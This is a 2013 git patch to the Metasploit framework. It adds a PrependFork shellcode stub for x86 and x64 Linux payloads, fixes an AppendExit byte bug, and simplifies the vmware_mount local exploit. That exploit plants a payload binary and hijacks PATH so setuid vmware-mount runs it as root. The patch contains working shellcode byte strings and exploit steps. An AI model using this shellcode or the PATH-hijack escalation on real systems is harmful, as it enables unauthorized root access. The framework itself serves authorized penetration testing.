From b913fcf1a721cc99f192ff1810f1a20acf400014 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 4 Sep 2013 00:14:59 -0500 Subject: [PATCH] Add a proper PrependFork for linux Also fixes a typo bug for AppendExit --- lib/msf/core/payload/linux.rb | 42 +++++++++++++++---- modules/exploits/linux/local/vmware_mount.rb | 18 +------- modules/payloads/stages/linux/x64/shell.rb | 1 + .../payloads/stages/linux/x86/meterpreter.rb | 16 ------- modules/payloads/stages/linux/x86/shell.rb | 2 +- 5 files changed, 39 insertions(+), 40 deletions(-) diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb index e323546128..5f205483fd 100644 --- a/lib/msf/core/payload/linux.rb +++ b/lib/msf/core/payload/linux.rb @@ -19,6 +19,13 @@ module Msf::Payload::Linux register_advanced_options( [ + Msf::OptBool.new('PrependFork', + [ + false, + "Prepend a stub that executes: if (fork()) { exit(0); }", + "false" + ] + ), Msf::OptBool.new('PrependSetresuid', [ false, @@ -97,6 +104,17 @@ module Msf::Payload::Linux # Prepend + if (datastore['PrependFork']) + pre << "\x6a\x02" +# pushb $0x2 # + "\x58" +# popl %eax # + "\xcd\x80" +# int $0x80 ; fork # + "\x85\xc0" +# test %eax,%eax # + "\x74\x06" +# jz 0xf # + "\x31\xc0" +# xor %eax,%eax # + "\xb0\x01" +# movb $0x1,%al ; exit # + "\xcd\x80" # int $0x80 # + end + if (datastore['PrependSetresuid']) # setresuid(0, 0, 0) pre << "\x31\xc9" +# xorl %ecx,%ecx # @@ -197,10 +215,8 @@ module Msf::Payload::Linux "\xcd\x80" # int $0x80 # end - end - # Handle all Power/CBEA code here - if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ])) + elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ])) # Prepend @@ -277,9 +293,21 @@ module Msf::Payload::Linux "\x38\x1f\xfe\x02" +# addi r0,r31,-510 # "\x44\xff\xff\x02" # sc # end - end - if (test_arch.include?(ARCH_X86_64)) + elsif (test_arch.include?(ARCH_X86_64)) + + if (datastore['PrependFork']) + # if (fork()) { exit(0); } + pre << "\x6a\x39" # push 57 ; __NR_fork # + pre << "\x58" # pop rax # + pre << "\x0f\x05" # syscall # + pre << "\x48\x85\xc0" # test rax,rax # + pre << "\x74\x08" # jz 0x08 # + pre << "\x48\x31\xff" # xor rdi,rdi # + pre << "\x6a\x3c" # push 60 ; __NR_exit # + pre << "\x58" # pop rax # + pre << "\x0f\x05" # syscall # + end if (datastore['PrependSetresuid']) # setresuid(0, 0, 0) @@ -389,8 +417,8 @@ module Msf::Payload::Linux # Append exit(0) if (datastore['AppendExit']) app << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x6a\x3c" # push 0x53 # - pre << "\x58" # pop rax # + app << "\x6a\x3c" # push 0x3c # + app << "\x58" # pop rax # app << "\x0f\x05" # syscall # end end diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index db3e9d1bab..ba83daba19 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -43,6 +43,7 @@ class Metasploit4 < Msf::Exploit::Local 'DefaultOptions' => { "PrependSetresuid" => true, "PrependSetresgid" => true, + "PrependFork" => true, }, 'Privileged' => true, 'DefaultTarget' => 0, @@ -73,22 +74,7 @@ class Metasploit4 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid") end - # Ghetto PrependFork action which is apparently only implemented for - # Meterpreter. - # XXX Put this in a mixin somewhere - # if(fork()) exit(0); - # 6A02 push byte +0x2 - # 58 pop eax - # CD80 int 0x80 ; fork - # 85C0 test eax,eax - # 7406 jz 0xf - # 31C0 xor eax,eax - # B001 mov al,0x1 - # CD80 int 0x80 ; exit - exe = generate_payload_exe( - :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded - ) - write_file("lsb_release", exe) + write_file("lsb_release", generate_payload_exe) cmd_exec("chmod +x lsb_release") cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount") diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index 8ab03efa17..cad0c23729 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb @@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' module Metasploit3 + include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index d83583fec3..45ded3f7a9 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -24,7 +24,6 @@ module Metasploit3 'Session' => Msf::Sessions::Meterpreter_x86_Linux)) register_options([ - OptBool.new('PrependFork', [ false, "Add a fork() / exit_group() (for parent) code" ]), OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ]) ], self.class) end @@ -71,21 +70,6 @@ module Metasploit3 midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp - if(datastore['PrependFork']) - # fork() / parent does exit() - - # If the target process is threaded, this means the thread - # will exit. exit_group() will try to close the process down - # completely.. and if we do that, it may not be reaped - # correctly. - # - # Plus, depending on the vuln, we might get multiple shots at - # owning a finite amount of threads. - - midstager << - "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" - end - midstager << "\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" + "\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" + diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index c4a1a98d6d..b1af987e14 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' module Metasploit3 - + include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {})